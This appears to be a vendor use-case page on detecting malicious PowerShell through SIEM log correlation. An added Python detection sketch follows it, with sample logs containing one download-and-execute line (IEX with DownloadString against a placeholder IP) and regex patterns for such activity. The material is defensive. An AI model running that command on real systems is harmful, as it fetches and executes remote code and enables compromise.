SIEM Use Cases

Detecting and Preventing Malicious PowerShell Attacks

PowerShell is a powerful Windows command-line and scripting language used by both IT specialists and attackers. It is an on-board command-line tool that can download code from another system and execute it, which gives it a unique level of access on Windows computers. Because system administrators use PowerShell to automate many tasks, it is enabled on most machines. Since its scripts and commands need not be written to disk, their malicious use is generally neither prevented nor noticed by traditional AV/HIPS products. Despite these difficulties, removing PowerShell is not ideal, given the benefits it provides to IT managers. A widespread problem we face is that the logs needed to understand what an attacker did with PowerShell are not being recorded. These logs give you the visibility required to respond to, hunt for, and remediate PowerShell-related attacks.

How to detect and prevent malicious PowerShell attacks

PowerShell activity on Windows systems is detected by Logsign SIEM through correlation. PowerShell logs, process creation logs and EDR logs are used in the detection process, and attacks are identified from the findings produced by analysing these logs.

1. PowerShell logs, process creation logs and EDR logs from Windows are forwarded to Logsign SIEM and subjected to the relevant correlation rules.

2. Following behavioural analysis with correlation operations, the user is labelled Attacker, Victim or Suspicious.

3. After the attacker's first activity on the user's side, the logs are enriched through behavioural analysis with the logs received from the sources. Log activity generated by the attacker's actions is correlated and displayed on the relevant dashboard panels.

4. Malicious PowerShell attacks detected by the Logsign correlation engine are surfaced by Logsign SIEM and, after analysis, shared with the relevant IT managers by SMS and e-mail.
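As an added example (not Logsign's code or configuration), the following Python sketches the correlation in steps 1 and 2: it joins constructed process-creation and PowerShell script-block records on host and user, flags the download-and-execute behaviour described above, and applies the Attacker, Victim and Suspicious labels. The sample records, field names, indicator patterns and labelling rule are all assumptions made for the example.

```python
import re
from collections import defaultdict
# Constructed sample events (not from the page), already parsed into dicts.
PROCESS_LOGS = [
    {"host": "WS01", "user": "alice", "parent": "explorer.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\ops\\backup.ps1"},
    {"host": "WS02", "user": "bob", "parent": "WINWORD.EXE",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand QQBCAEMA"},
]
POWERSHELL_LOGS = [
    {"host": "WS01", "user": "alice", "script": "Copy-Item C:\\data D:\\backup -Recurse"},
    {"host": "WS02", "user": "bob",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/x')"},
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
PROC_PATTERNS = {  # command-line indicators read from the process-creation log
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+\S+", re.I),
}
# Script-block indicator: code fetched from another system and run in memory,
# the behaviour the text describes, which never touches disk.
FETCH = r"(?:DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient)"
RUN = r"(?:IEX|Invoke-Expression)"
DOWNLOAD_EXEC = re.compile(f"{RUN}.*{FETCH}|{FETCH}.*{RUN}", re.I)
URL_HOST = re.compile(r"https?://([^/'\"\s:]+)")

def correlate(process_logs, powershell_logs):
    """Join both sources on (host, user); collect indicators and remote hosts."""
    f = defaultdict(lambda: {"process": set(), "script": set(), "remote": set()})
    for ev in process_logs:
        key = (ev["host"], ev["user"])
        if ev["parent"].lower() in OFFICE_PARENTS:  # Office spawning PowerShell
            f[key]["process"].add("office_parent")
        f[key]["process"].update(n for n, p in PROC_PATTERNS.items() if p.search(ev["cmdline"]))
    for ev in powershell_logs:
        if DOWNLOAD_EXEC.search(ev["script"]):
            key = (ev["host"], ev["user"])
            f[key]["script"].add("download_and_execute")
            f[key]["remote"].update(URL_HOST.findall(ev["script"]))  # enrichment
    return f

def triage(process_logs, powershell_logs):
    """Suspicious on one source, Victim when both agree, Attacker for the serving host."""
    labels = {}
    for key, f in correlate(process_logs, powershell_logs).items():
        if f["process"] and f["script"]:
            labels[key] = "Victim"
        elif f["process"] or f["script"]:
            labels[key] = "Suspicious"
        labels.update({("remote", r): "Attacker" for r in f["remote"]})
    return labels
```

In a real deployment the two dictionaries would be fed from the SIEM's parsed event stream, and the labels would drive the dashboard panels and notifications described in steps 3 and 4.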
